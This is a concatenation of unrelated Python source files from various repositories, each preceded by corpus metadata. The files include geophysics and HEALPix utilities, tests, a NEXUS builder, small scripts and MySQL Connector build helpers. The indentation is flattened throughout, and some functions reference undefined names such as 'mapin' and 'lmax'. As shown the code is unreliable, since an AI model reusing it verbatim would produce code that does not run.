:param Euler_Pole: [longitude, latitude, omega] of Euler Pole, in degrees and degrees/Ma
:type Euler_Pole: array_like
:returns: [e_velocity, n_velocity, u_velocity] of point in rotated reference frame, in mm/yr
:rtype: array_like
"""
R_point = get_r(Point[0], Point[1]);
R_ep = get_r(Euler_Pole[0], Euler_Pole[1]);
unit_ep = fault_vector_functions.get_unit_vector(R_ep);
omega_raw = degma2radyr(Euler_Pole[2]);
omega = omega_raw * unit_ep; # in radians per year
velocity_of_transformation = np.cross(omega, R_point); # velocity at the station from the euler pole rotation
velocity_of_transformation = velocity_of_transformation * 1000; # mm/yr in x, y, z
xvel = velocity_of_transformation[0];
yvel = velocity_of_transformation[1];
zvel = velocity_of_transformation[2];
[east_transform, north_transform] = xyz2en(xvel, yvel, zvel, Point[0]);
up_transform = 0; # by definition the velocity will be horizontal
return [east_transform, north_transform, up_transform];
def degma2radyr(omega):
"""Convert omega from degrees/Ma to radians/yr"""
radyr = omega * (np.pi / 180) * 1e-6;
return radyr;
def get_r(lon, lat):
"""
Vector from center of earth to the point in question assuming a spherical earth.
The XYZ coordinate system has x=0 at longitude=0 and z=0 at the equator with positive to the north.
:param lon: Longitude of initial point, in degrees
:type lon: float
:param lat: Latitude of initial point, in degrees
:type lat: float
:returns: [X, Y, Z] coordinates in meters.
:rtype: [float, float, float]
"""
R_fixed = 6378000; # In meters
R_equatorial_disk = R_fixed * np.cos(np.deg2rad(lat));
T_equatorial_disk = np.deg2rad(lon);
X = R_equatorial_disk * np.cos(T_equatorial_disk);
Y = R_equatorial_disk * np.sin(T_equatorial_disk);
Z = np.sqrt(R_fixed * R_fixed - X * X - Y * Y);
if lat < 0:
Z = Z * -1;
return [X, Y, Z];
def get_unit_east(lon):
"""
Unit east vector from a point on earth's surface in XYZ coordinates.
The XYZ coordinate system has x=0 at longitude=0 and z=0 at the equator with positive to the north.
The return value of Z is zero for eastward motion.
:param lon: Longitude of initial point, in degrees
:type lon: float
:returns: [X, Y, Z] components
:rtype: [float, float, float]
"""
T_equatorial_disk = np.deg2rad(lon);
x = -np.sin(T_equatorial_disk);
y = np.cos(T_equatorial_disk);
return [x, y, 0];
def xyz2en(x, y, z, lon):
"""
Convert velocities from xyz to horizontal east and north, assuming spherical earth and no vertical motion.
We take the dot product of the velocity with the unit east vector and the north component is the remainder.
A more complex function xyz2enu(X, Y, Z, lon, lat) could be written later.
:param x: x velocity at observation point
:type x: float
:param y: y velocity at observation point
:type y: float
:param z: z velocity at observation point
:type z: float
:param lon: Longitude of observation point, in degrees
:type lon: float
:returns: [east_vel, north_vel]
:rtype: [float, float]
"""
vel_vector = [x, y, z];
unit_east = get_unit_east(lon);
e = np.dot(vel_vector, unit_east);
n = np.sqrt(x * x + y * y + z * z - e * e);
if z < 0:
n = n * -1;
return [e, n];
if __name__ == "__main__":
Euler_Pole = [69.9, -12.3, 0.55]; # Lon, Lat, Deg/Ma
Point = [-124, 40.5]; # Lon, Lat
[east_transform, north_transform, up_transform] = point_rotation_by_Euler_Pole(Point, Euler_Pole);
total = np.sqrt(east_transform * east_transform + north_transform * north_transform);
print("%.2f east, %.2f north, %.2f up, %.2f mm/yr total" % (east_transform, north_transform, up_transform, total));
| 3.953125 | 4 |
comparer.py | Wason1/Multum | 0 | 12795698 | # Variables
base_list = 'List_1' # this is the base list, each item in this list is checked for a match in the other
list_2 = 'List_2' # List_2 is the name of the list in the excel file
xlfile = 'DATA_IN.xlsx'
# Importing Libs
import pandas as pd
import numpy as np
# Smart Stuff
df_0 = pd.read_excel(xlfile, dtype=str)
#rename columns
df_0.rename(columns={base_list: "base_list", list_2: "list_2"}
, inplace=True)
df = pd.DataFrame()
#create new df
df['base_list'] = df_0['base_list']
# create new columns
df['Exact Matches'] = ''
df['Words Matched'] = ''
# unique list of words in list 2
list_2_words = ' '.join([i for i in df_0['list_2']]).split()
list_2_words = list(dict.fromkeys(list_2_words))
# loop though keys
for index, row in df.iterrows():
current_key = row['base_list']
current_key = str(current_key)
count = (df_0.list_2 == current_key).sum()
row['Exact Matches']= count
current_key_list = current_key.split(' ')
for item in current_key_list:
if item in list_2_words:
row['Words Matched'] = row['Words Matched'] + '|' + item
# Dump Excel Sheet
df.to_excel('DATA_OUT.xlsx')
| 3.359375 | 3 |
src/common.py | daffidwilde/edo-paper | 0 | 12795699 | """ Common functions and parameters amongst the experiments. """
from edo.distributions import Uniform
from sklearn.preprocessing import MinMaxScaler
def scale_dataframe(individual):
""" Scale the individual's dataframe to the unit square for calculating
fitness. """
original = individual.dataframe.copy()
dataframe = MinMaxScaler().fit_transform(original)
return dataframe
size = 100
row_limits = [50, 100]
col_limits = [2, 2]
max_iter = 100
best_prop = 0.1
mutation_prob = 0.01
Uniform.param_limits["bounds"] = [0, 1]
distributions = [Uniform]
root = "../data/"
| 3 | 3 |
pycs/sparsity/mrs/mrs_tools.py | sfarrens/cosmostat | 3 | 12795700 |
import numpy as np
import random
import os, sys
from scipy import ndimage
import healpy as hp
from astropy.io import fits
import matplotlib.pyplot as plt
from scipy.signal import savgol_filter
from astropy.io import fits
from importlib import reload
from pycs.misc.cosmostat_init import *
from pycs.misc.mr_prog import *
def make_healpix_map(ra, dec, weights, nside):
pixels= hp.ang2pix(nside,theta = 0.5*np.pi - np.deg2rad(dec), phi = np.deg2rad(ra))
bincount = np.bincount(pixels, minlength = hp.nside2npix(nside))
bincount_weighted = np.bincount(pixels, minlength = hp.nside2npix(nside), weights=weights)
return np.where(bincount>0.5, bincount_weighted/bincount, hp.UNSEEN)
def get_bincount(ra, dec, nside):
pixels= hp.ang2pix(nside,theta = 0.5*np.pi - np.deg2rad(dec), phi = np.deg2rad(ra))
bincount = np.bincount(pixels, minlength = hp.nside2npix(nside))
return bincount
def mrs_read(FN):
return hp.read_map(FN)
def mrs_write(FN, mapin):
hp.write_map(FN, mapin, overwrite=True)
def rims(FN):
return hp.read_map(FN)
def mrs_resize(mapin, nsideout):
k = hp.ud_grade(mapin, nsideout)
return k
# smoothing with sigma in arcmin
def smooth(map, sigma):
s= hp.smoothing(mapin, sigma=sigma/(360.*60.) * (np.pi*2),pol=False)
# lut='rainbow' # 'inferno' 'gist_stern'
def tvs(mapin,min=None,max=None,title=None,sigma=None,lut=None):
if sigma is None:
hp.mollview(mapin,max=max,min=min, title=title,cmap=lut)
else:
s= hp.smoothing(mapin, sigma=sigma/(360.*60.) * (np.pi*2),pol=False)
hp.mollview(s,max=max,min=min, title=title,cmap=lut)
hp.mollview
def get_nside(Npix):
return hp.npix2nside(Npix)
def gnside(data):
npix = data.shape[0]
nside = hp.npix2nside(npix)
return nside
def pixel_size(nside):
# Return the pixel size of a healpix map in arc minutes
# SKI_SURFACE IN SQUARE DEGREES = 4. * !PI * (360. / (2*!PI))^2 = 41253
psize = 41253. / (float(nside)**2.*12.) * 60.**2.
return np.sqrt(psize)
def l2amin(l):
a = 1. / l
a = a * 180.* 60. / np.pi
return a
def amin2l(a):
ar = a / (180.* 60.) * np.pi
l = 1. / ar
return l
def g2eb(g1,g2):
nside = gnside(g1)
(ae,ab) = hp.map2alm_spin((g1,g2), 2)
ke= hp.alm2map(ae, nside, pol=False)
kb= hp.alm2map(ab, nside, pol=False)
return ke,kb
def g2k(g1,g2):
nside = gnside(g1)
(ae,ab) = hp.map2alm_spin((g1,g2), 2)
ke= hp.alm2map(ae, nside, pol=False)
return ke
def k2g(ke):
nside = gnside(ke)
ae = hp.map2alm(ke, 1,pol=False)
ab = np.copy(ae) * 0.
(g1,g2) = hp.alm2map_spin((ae,ab), 2, lmax=lmax)
return g1,g2
# it seems that hp.alm2map_spin crashes.
def eb2g(ke,kb):
nside = gnside(ke)
lmax=nside*3 - 1
ae = hp.map2alm(ke, 1, pol=False)
ab = hp.map2alm(kb, 1, pol=False)
(g1,g2) = hp.alm2map_spin( (ae,ab), nside, 2, lmax)
return g1,g2
def mrs_prog(data, prog="mrs_powspec", opt=None, path='./', remove_files=True, verbose=False, FileOut=None, InputFormatisHealpix=True, OutputFormatisHealpix=True):
# Create a unique string using the current date and time.
# print('mr_filter ', opt)
unique_string = datetime.now().strftime('%Y.%m.%d_%H.%M.%S')
result=0
# Set the ouput file names.
file_name = path + 'mr_temp_' + unique_string
file_fits = file_name + '.fits'
if FileOut is not None:
file_out = FileOut
else:
file_out = file_name + '_out.fits'
# Write the input data to a fits file.
if InputFormatisHealpix:
mrs_write(file_fits, data)
else:
writefits(file_fits, data)
# print("PROG: ", prog)
cmd = prog
if isinstance(opt, type(None)):
optF=' '
else:
optF= opt
if verbose:
optF = optF + " -v "
cmd = cmd + " " + optF + " " + file_fits + " " + file_out
if verbose:
print ('CMD = ', cmd)
args = shlex.split(cmd)
# print('args ', args)
call(args)
# Retrieve wavelet filtered data.
if OutputFormatisHealpix:
result = mrs_read(file_out)
else:
result = readfits(file_out)
# Return the mr_transform results (and the output file names).
if remove_files:
remove(file_fits)
remove(file_out)
return result
else:
return result
def mrs_powspec(map, verbose=False):
p = mrs_prog(map, prog="mrs_powspec", verbose=verbose, OutputFormatisHealpix=False)
return p
def mrs_smooth(map, opt=None, verbose=False):
p = mrs_prog(map, prog="mrs_smooth", verbose=verbose, opt=opt, OutputFormatisHealpix=True)
return p
def mrs_almtrans(map, lmax=None, opt=None, verbose=False):
optParam = ' -T '
if opt is not None:
optParam = ' -T ' + opt
if lmax is not None:
optParam = ' -l ' + str(lmax) + optParam
p = mrs_prog(map, prog="mrs_almtrans", verbose=verbose, opt=optParam, OutputFormatisHealpix=False)
return p
def mrs_almrec(map, opt=None, verbose=False,nside=None):
optParam = ' -T '
if opt is not None:
optParam = ' -T ' + opt
if nside is not None:
optParam = ' -n ' + str(nside) + optParam
p = mrs_prog(map, prog="mrs_almrec", verbose=verbose, opt=optParam, InputFormatisHealpix=False, OutputFormatisHealpix=True)
return p
def tol(map,lmax_amin,amin=False):
ns= gnside(map)
lmax=lmax_amin
if amin is True:
lmax=amin2l(lmax_amin)
a = mrs_almtrans(map, lmax=lmax)
b = mrs_almrec(a, nside=ns)
return b
def mrs_uwttrans(map, lmax=None, opt=None, verbose=False, path='./',progpath=None):
optParam = ' '
if opt is not None:
optParam = ' ' + opt
if lmax is not None:
optParam = ' -l ' + str(lmax) + optParam
if progpath is None:
prog="mrs_uwttrans"
else:
prog=progpath+"mrs_uwttrans"
p = mrs_prog(map, prog=prog, verbose=verbose, opt=optParam, OutputFormatisHealpix=False,path=path)
return p
def mrs_uwtrecons(Tmap, lmax=None, opt=None, verbose=False, path='./',progpath=None):
optParam = ' '
if opt is not None:
optParam = ' ' + opt
if lmax is not None:
optParam = ' -l ' + str(lmax) + optParam
if progpath is None:
prog="mrs_uwttrans"
else:
prog=progpath+"mrs_uwttrans -r "
p = mrs_prog(Tmap, prog=prog, verbose=verbose, opt=optParam, InputFormatisHealpix=False, OutputFormatisHealpix=True,path=path)
return p
| 1.984375 | 2 |
tests/contract/test_get_all_catalogs.py | Informasjonsforvaltning/organization-page-bffe | 0 | 12795701 | """Contract test cases for cases for all organization catalogs."""
import json
import pytest
import requests
from tests import responses
@pytest.mark.contract
@pytest.mark.docker
def test_all_catalogs(docker_service: str) -> None:
"""Should return the all_catalogs response."""
url = f"{docker_service}/organizationcatalogs"
response = requests.get(url)
assert response.status_code == 200
assert response.json() == json.loads(responses.all_catalogs)
@pytest.mark.contract
@pytest.mark.docker
def test_all_catalogs_has_no_cache_headers(docker_service: str) -> None:
"""Should include no-cache headers."""
url = f"{docker_service}/organizationcatalogs"
response = requests.get(url)
assert response.status_code == 200
assert (
response.headers.get("Cache-Control")
== "no-cache, no-store, max-age=0, must-revalidate"
)
@pytest.mark.contract
@pytest.mark.docker
def test_all_nap_catalogs(docker_service: str) -> None:
"""Should return the all_nap response."""
url = f"{docker_service}/organizationcatalogs?filter=transportportal"
response = requests.get(url)
assert response.status_code == 200
assert response.json() == json.loads(responses.all_nap)
@pytest.mark.contract
@pytest.mark.docker
def test_invalid_filter(docker_service: str) -> None:
"""Should return 400."""
url = f"{docker_service}/organizationcatalogs?filter=invalid"
response = requests.get(url)
assert response.status_code == 400
| 2.484375 | 2 |
build/build_nexus.py | evotext/ielex-data-and-tree | 2 | 12795702 | """
Builds a NEXUS file form a long-table format CSV.
"""
import csv
from pathlib import Path
from collections import defaultdict
BASE = Path(__file__).parents[1] / "data"
with open(BASE / "ielex.csv", encoding="utf-8") as h:
data = list(csv.DictReader(h))
taxa = sorted(set([row["LANGUAGE"] for row in data]))
cogs = defaultdict(list)
all_cogs = defaultdict(set)
for row in data:
cogs[row["LANGUAGE"], row["CONCEPT"]].append(row["COGNATE"])
all_cogs[row["CONCEPT"]].add(row["COGNATE"])
all_cogs = {key: sorted(value) for key, value in all_cogs.items()}
charstates = []
assumptions = []
cur_idx = 1
for cog in sorted(all_cogs):
value = all_cogs[cog]
k = value[0].split("_")[0]
charstates.append(f"{k}_ascertainment")
for sub in value:
charstates.append(sub)
end_idx = cur_idx + len(value)
assumptions.append([cog, cur_idx, end_idx])
cur_idx = end_idx + 1
matrix = {}
for taxon in taxa:
buf = ""
for concept in sorted(all_cogs):
buf += "0" # ascert
cogids = all_cogs[concept]
# if empty
if len(cogs[taxon, concept]) == 0:
buf += "?" * len(cogids)
else:
vec = [cogid in cogs[taxon, concept] for cogid in cogids]
buf += "".join([["0", "1"][v] for v in vec])
matrix[taxon] = buf
############
taxon_len = max([len(taxon) for taxon in taxa])
nexus = ""
nexus += "#NEXUS\n\n"
nexus += "BEGIN DATA;\n"
nexus += "\tDIMENSIONS NTAX=%i NCHAR=%i;\n" % (len(taxa), len(matrix[taxa[0]]))
nexus += '\tFORMAT DATATYPE=STANDARD MISSING=? GAP=- SYMBOLS="01";'
nexus += "\tCHARSTATELABELS\n"
nexus += ",\n".join(["\t\t%i %s" % (idx + 1, cs) for idx, cs in enumerate(charstates)])
nexus += "\n;\n"
nexus += "MATRIX\n"
for taxon, vector in matrix.items():
label = taxon.ljust(taxon_len + 4)
nexus += "%s %s\n" % (label, vector)
nexus += ";\n"
nexus += "END;\n\n"
nexus += "begin assumptions;\n"
for assump in assumptions:
v = all_cogs[assump[0]][0].split("_")[0]
nexus += "\tcharset %s = %i-%i;\n" % (v, assump[1], assump[2])
nexus += "end;\n\n"
print(nexus)
| 2.65625 | 3 |
python/sagiri-bot/SAGIRIBOT/data_manage/get_data/get_rank.py | GG-yuki/bugs | 0 | 12795703 | from graia.application.message.chain import MessageChain
from graia.application.message.elements.internal import Plain
from graia.application.message.elements.internal import At
from SAGIRIBOT.basics.aio_mysql_excute import execute_sql
async def get_rank(group_id: int, memberList: list) -> list:
sql = "select * from dragon where groupId=%d order by count desc" % group_id
lsp_rank = await execute_sql(sql)
print(lsp_rank)
msg = []
text = "啊嘞嘞,从启动到现在都没有人要过涩图的嘛!呜呜呜~\n人家。。。人家好寂寞的,快来找我玩嘛~"
if lsp_rank == ():
return [
"None",
MessageChain.create([
Plain(text=text)
])
]
else:
lsp_champion_count = lsp_rank[0][3]
if lsp_champion_count == 0:
return [
"None",
MessageChain.create([
Plain(text=text)
])
]
text = "目前lsp排行榜:"
msg.append(Plain(text=text))
text = ""
index = 0
add_bool = False
add = 0
last = -1
for i in lsp_rank:
if i[3] == 0:
break
if i[3] == last:
add += 1
add_bool = True
else:
if add_bool:
index += add
index += 1
add = 0
add_bool=False
last = i[3]
text += "\n%i.%-20s %3d" % (index, qq2name(memberList,i[2]), i[3])
msg.append(Plain(text=text))
return msg | 2.140625 | 2 |
python/ABC111/ABC111A.py | yu8ikmnbgt6y/MyAtCoder | 0 | 12795704 | <gh_stars>0
def chg(n):
if n==1:
return 9
elif n==9:
return 1
return n
n = int(input())
n,a1 = divmod(n,10)
n,a2 = divmod(n,10)
n,a3 = divmod(n,10)
print(100*chg(a3)+10*chg(a2)+chg(a1)) | 3.109375 | 3 |
day11/test_day11.py | Frost/aoc2021-py | 0 | 12795705 |
from day11 import *
test_input = """
5483143223
2745854711
5264556173
6141336146
6357385478
4167524645
2176841721
6882881134
4846848554
5283751526
"""
def test_cave_constructor():
cave = Cave(["12", "34"])
assert cave.energy_levels() == [[1,2], [3,4]]
def test_simple_tick():
test_data = """
11111
19991
19191
19991
11111
""".strip().split("\n")
cave = Cave(test_data)
assert cave.tick() == 9
assert cave.energy_levels() == [
[3, 4, 5, 4, 3],
[4, 0, 0, 0, 4],
[5, 0, 0, 0, 5],
[4, 0, 0, 0, 4],
[3, 4, 5, 4, 3],
]
assert cave.tick() == 0
assert cave.energy_levels() == [
[4,5,6,5,4],
[5,1,1,1,5],
[6,1,1,1,6],
[5,1,1,1,5],
[4,5,6,5,4],
]
def test_flashes():
lines = test_input.strip().split("\n")
cave = Cave(lines)
assert cave.tick() == 0
assert cave.tick() == 35
def test_part1():
lines = test_input.strip().split("\n")
assert part1(lines) == 1656
def test_part2():
lines = test_input.strip().split("\n")
assert part2(lines) == 195
| 2.5 | 2 |
forms/product_form.py | vankrajnova/selenium | 0 | 12795706 | <gh_stars>0
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
class ProductForm:
def __init__(self, app):
self.app = app
self._elements = Elements(app)
def add_product_to_cart(self):
quantity = self._elements.quantity().text
self._elements.add_to_cart_btn().click()
count = int(quantity) + 1
self.app.wait.until(EC.text_to_be_present_in_element((By.XPATH, """//span[contains(@class, "quantity")]"""), str(count)))
class Elements:
def __init__(self, app):
self.app = app
def add_to_cart_btn(self):
xpath = """//button[contains(@name, 'add_cart_product')]"""
return self.app.wd.find_element_by_xpath(xpath)
def quantity(self):
xpath = """//span[contains(@class, "quantity")]"""
return self.app.wd.find_element_by_xpath(xpath) | 2.875 | 3 |
setup.py | dabapps/django-db-queue-exports | 0 | 12795707 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
import re
import os
import sys
name = "django-db-queue-exports"
package = "django_dbq_exports"
description = "An extension to django-db-queue for monitoring long running jobs"
url = "https://www.dabapps.com/"
project_urls = {"Source": "https://github.com/dabapps/{}".format(name)}
author = "DabApps"
author_email = "<EMAIL>"
license = "BSD"
with open("README.md") as f:
readme = f.read()
with open("requirements.txt") as f:
requirements = f.read().split("\n")
def get_version(package):
"""
Return package version as listed in `__version__` in `init.py`.
"""
init_py = open(os.path.join(package, "__init__.py")).read()
return re.search("^__version__ = ['\"]([^'\"]+)['\"]", init_py, re.MULTILINE).group(
1
)
def get_packages(package):
"""
Return root package and all sub-packages.
"""
return [
dirpath
for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, "__init__.py"))
]
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [
(dirpath.replace(package + os.sep, "", 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, "__init__.py"))
]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename) for filename in filenames])
return {package: filepaths}
setup(
name=name,
version=get_version(package),
url=url,
project_urls=project_urls,
license=license,
description=description,
long_description=readme,
long_description_content_type="text/markdown",
author=author,
author_email=author_email,
packages=get_packages(package),
package_data=get_package_data(package),
install_requires=requirements,
classifiers=[],
include_package_data=True,
zip_safe=False,
options={"build": {"build_base": "tmp_build"}},
)
| 2.015625 | 2 |
dragonflow/tests/unit/test_ryu_base_app.py | FrankDuan/df_code | 0 | 12795708 | <reponame>FrankDuan/df_code
# Copyright (c) 2015 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from dragonflow.controller.ryu_base_app import RyuDFAdapter
from dragonflow.tests import base as tests_base
from oslo_config import cfg
class TestRyuDFAdapter(tests_base.BaseTestCase):
"""
This unit test has to verify that all events are called correctly, both
via the notify* functions, as well as the events called from ryu.
Having ryu call these events will be done in the functional tests.
"""
def setUp(self):
super(TestRyuDFAdapter, self).setUp()
self.db_store = mock.Mock()
cfg.CONF = mock.Mock()
self.ryu_df_adapter = RyuDFAdapter(db_store=self.db_store)
self.mock_app = mock.Mock(spec=[
'update_logical_switch',
'remove_logical_switch',
'add_local_port',
'remove_local_port',
'add_remote_port',
'remove_remote_port',
'add_router_port',
'remove_router_port',
'add_security_group_rule',
'remove_security_group_rule',
'switch_features_handler',
'port_desc_stats_reply_handler',
'packet_in_handler'
])
def dispatcher_load(*args, **kwargs):
self.ryu_df_adapter.dispatcher.apps = [self.mock_app]
self.ryu_df_adapter.dispatcher.load = dispatcher_load
self.ryu_df_adapter.load()
def test_notifies(self):
self.mock_app.reset_mock()
self.ryu_df_adapter.notify_update_logical_switch(lswitch=1)
self.ryu_df_adapter.notify_remove_logical_switch(lswitch=2)
self.ryu_df_adapter.notify_add_local_port(lport=3)
self.ryu_df_adapter.notify_remove_local_port(lport=4)
self.ryu_df_adapter.notify_add_remote_port(lport=5)
self.ryu_df_adapter.notify_remove_remote_port(lport=6)
self.ryu_df_adapter.notify_add_router_port(
router=7, router_port=8, local_network_id=9)
self.ryu_df_adapter.notify_remove_router_port(
router_port=10, local_network_id=11)
self.ryu_df_adapter.notify_add_security_group_rule(
secgroup=12, secgroup_rule=13)
self.ryu_df_adapter.notify_remove_security_group_rule(
secgroup=14, secgroup_rule=15)
self.mock_app.assert_has_calls([
mock.call.update_logical_switch(lswitch=1),
mock.call.remove_logical_switch(lswitch=2),
mock.call.add_local_port(lport=3),
mock.call.remove_local_port(lport=4),
mock.call.add_remote_port(lport=5),
mock.call.remove_remote_port(lport=6),
mock.call.add_router_port(
local_network_id=9, router=7, router_port=8),
mock.call.remove_router_port(
local_network_id=11, router_port=10),
mock.call.add_security_group_rule(
secgroup=12, secgroup_rule=13),
mock.call.remove_security_group_rule(
secgroup=14, secgroup_rule=15)])
def test_switch_features_handler(self):
self.mock_app.reset_mock()
ev = mock.Mock()
ev.msg = mock.Mock()
ev.msg.datapath = mock.Mock()
ev.msg.datapath.ofproto = mock.Mock()
ev.msg.datapath.ofproto.OFP_VERSION = 0x04
self.ryu_df_adapter.switch_features_handler(ev)
self.mock_app.assert_has_calls([mock.call.switch_features_handler(ev)])
def test_port_desc_stats_reply_handler(self):
self.mock_app.reset_mock()
ev = mock.Mock()
self.ryu_df_adapter.port_desc_stats_reply_handler(ev)
self.mock_app.assert_has_calls([
mock.call.port_desc_stats_reply_handler(ev)])
def test_port_status_handler(self):
self.mock_app.reset_mock()
ev = mock.Mock()
ev.msg.reason = ev.msg.datapath.ofproto.OFPPR_ADD
self.ryu_df_adapter._port_status_handler(ev)
port_name = ev.msg.desc.name
lport = self.db_store.get_local_port_by_name(port_name)
self.mock_app.assert_has_calls([mock.call.add_local_port(lport=lport)])
lport.assert_has_calls([
mock.call.set_external_value('ofport', ev.msg.desc.port_no),
mock.call.set_external_value('is_local', True)])
self.mock_app.reset_mock()
ev = mock.Mock()
ev.msg.reason = ev.msg.datapath.ofproto.OFPPR_DELETE
self.ryu_df_adapter._port_status_handler(ev)
port_name = ev.msg.desc.name
lport = self.db_store.get_local_port_by_name(port_name)
self.mock_app.assert_has_calls([
mock.call.remove_local_port(lport=lport)])
#TODO(oanson) Once notification is added, add update_local_port test
def test_packet_in_handler(self):
self.mock_app.reset_mock()
ev = mock.Mock()
ev.msg.table_id = 10
self.ryu_df_adapter.register_table_handler(
10, self.mock_app.packet_in_handler)
self.ryu_df_adapter.OF_packet_in_handler(ev)
self.mock_app.assert_has_calls([mock.call.packet_in_handler(ev)])
| 1.9375 | 2 |
cpydist/utils.py | timgates42/mysql-connector-python | 1 | 12795709 | <filename>cpydist/utils.py<gh_stars>1-10
# Copyright (c) 2020, Oracle and/or its affiliates.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2.0, as
# published by the Free Software Foundation.
#
# This program is also distributed with certain software (including
# but not limited to OpenSSL) that is licensed under separate terms,
# as designated in a particular file or component or in included license
# documentation. The authors of MySQL hereby grant you an
# additional permission to link the program and your derivative works
# with the separately licensed software that they have included with
# MySQL.
#
# Without limiting anything contained in the foregoing, this file,
# which is part of MySQL Connector/Python, is also subject to the
# Universal FOSS Exception, version 1.0, a copy of which can be found at
# http://oss.oracle.com/licenses/universal-foss-exception.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License, version 2.0, for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Miscellaneous utility functions."""
import gzip
import logging
import os
import platform
import re
import shlex
import subprocess
import struct
import sys
import tarfile
from datetime import datetime
from distutils.errors import DistutilsInternalError
from distutils.dir_util import mkpath
from distutils.file_util import copy_file
from distutils.spawn import find_executable
from distutils.sysconfig import get_python_version
from distutils.version import LooseVersion
from subprocess import Popen, PIPE
from xml.dom.minidom import parse, parseString
try:
from dateutil.tz import tzlocal
NOW = datetime.now(tzlocal())
except ImportError:
NOW = datetime.now()
try:
from urllib.parse import parse_qsl
except ImportError:
from urlparse import parse_qsl
ARCH = "64-bit" if sys.maxsize > 2**33 else "32-bit"
ARCH_64BIT = ARCH == "64-bit"
MYSQL_C_API_MIN_VERSION = (8, 0, 0)
LOGGER = logging.getLogger("cpydist")
# 64bit Conditional check, only includes VCPPREDIST2015 property
VC_RED_64 = (
'<Product>'
'<!-- Check Visual c++ Redistributable is Installed -->'
'<Property Id="VS14REDIST">'
' <RegistrySearch Id="FindRedistVS14" Root="HKLM"'
' Key="SOFTWARE\\Microsoft\\DevDiv\\vc\\Servicing\\14.0\\RuntimeMinimum"'
' Name="Version" Type="raw" />'
'</Property>'
'<Condition Message="This application requires Visual Studio 2015'
' Redistributable. Please install the Redistributable then run this'
' installer again.">'
' Installed OR VS14REDIST'
'</Condition>'
'</Product>'
)
# 64bit Conditional check, only install if OS is 64bit. Used in MSI-64
ONLY_64bit = (
'<Product>'
'<Condition Message="This version of the installer is only suitable to'
' run on 64 bit operating systems.">'
'<![CDATA[Installed OR (VersionNT64 >=600)]]>'
'</Condition>'
'</Product>'
)
def _parse_mysql_info_line(line):
"""Parse a command line.
This will never be perfect without special knowledge about all possible
command lines "mysql_config" might output. But it should be close enough
for our usage.
"""
args = shlex.split(line)
# Find out what kind of argument it is first,
# if starts with "--", "-" or nothing
pre_parsed_line = []
for arg in args:
re_obj = re.search(r"^(--|-|)(.*)", arg)
pre_parsed_line.append(re_obj.group(1, 2))
parsed_line = []
while pre_parsed_line:
(type1, opt1) = pre_parsed_line.pop(0)
if "=" in opt1:
# One of "--key=val", "-key=val" or "key=val"
parsed_line.append(tuple(opt1.split("=", 1)))
elif type1:
# We have an option that might have a value
# in the next element in the list
if pre_parsed_line:
(type2, opt2) = pre_parsed_line[0]
if type2 == "" and "=" not in opt2:
# Value was in the next list element
parsed_line.append((opt1, opt2))
pre_parsed_line.pop(0)
continue
if type1 == "--":
# If "--" and no argument then it is an option like "--fast"
parsed_line.append(opt1)
else:
# If "-" (and no "=" handled above) then it is a
# traditional one character option name that might
# have a value
val = opt1[1:]
if val:
parsed_line.append((opt1[:1], val))
else:
parsed_line.append(opt1)
else:
LOGGER.warning("Could not handle '%s' in '%s'", opt1, line)
return parsed_line
def _mysql_c_api_info_win(mysql_capi):
"""Get MySQL information without using mysql_config tool.
Returns:
dict: A dict containing the information about the last commit.
"""
info = {}
mysql_version_h = os.path.join(mysql_capi, "include", "mysql_version.h")
if not os.path.exists(mysql_version_h):
LOGGER.error("Invalid MySQL C API installation "
"(mysql_version.h not found)")
sys.exit(1)
# Get MySQL version
with open(mysql_version_h, "rb") as fp:
for line in fp.readlines():
if b"#define LIBMYSQL_VERSION" in line:
version = LooseVersion(
line.split()[2].replace(b'"', b'').decode()
).version
if tuple(version) < MYSQL_C_API_MIN_VERSION:
LOGGER.error("MySQL C API {} or later required"
"".format(MYSQL_C_API_MIN_VERSION))
sys.exit(1)
break
info["libraries"] = ["libmysql"]
info["library_dirs"] = [os.path.join(mysql_capi, "lib")]
info["include_dirs"] = [os.path.join(mysql_capi, "include")]
# Get libmysql.dll arch
connc_64bit = _win_dll_is64bit(
os.path.join(mysql_capi, "lib", "libmysql.dll"))
LOGGER.debug("connc_64bit: {0}".format(connc_64bit))
info["arch"] = "x86_64" if connc_64bit else "i386"
return info
def mysql_c_api_info(mysql_config):
"""Get MySQL information using mysql_config tool.
Returns:
dict: Containing MySQL information about libraries.
"""
if os.name == "nt":
return _mysql_c_api_info_win(mysql_config)
if os.path.isdir(mysql_config):
mysql_config = os.path.join(mysql_config, "bin", "mysql_config")
LOGGER.info("Getting MySQL information from %s", mysql_config)
process = Popen([mysql_config], stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
if not stdout:
raise ValueError("Error executing command: {} ({})"
"".format(mysql_config, stderr))
# Parse the output. Try to be future safe in case new options
# are added. This might of course fail.
info = {}
for line in stdout.splitlines():
re_obj = re.search(
r"^\s+(?:--)?(\w+)\s+\[\s*(.*?)\s*\]", line.decode("utf-8"))
if re_obj:
mc_key = re_obj.group(1)
mc_val = re_obj.group(2)
# We always add the raw output from the different "mysql_config"
# options. And in some cases, like "port", "socket", that is enough
# for use from Python.
info[mc_key] = mc_val
LOGGER.debug("%s: %s", mc_key, mc_val)
if not re.search(r"^-", mc_val) and "=" not in mc_val:
# Not a Unix command line
continue
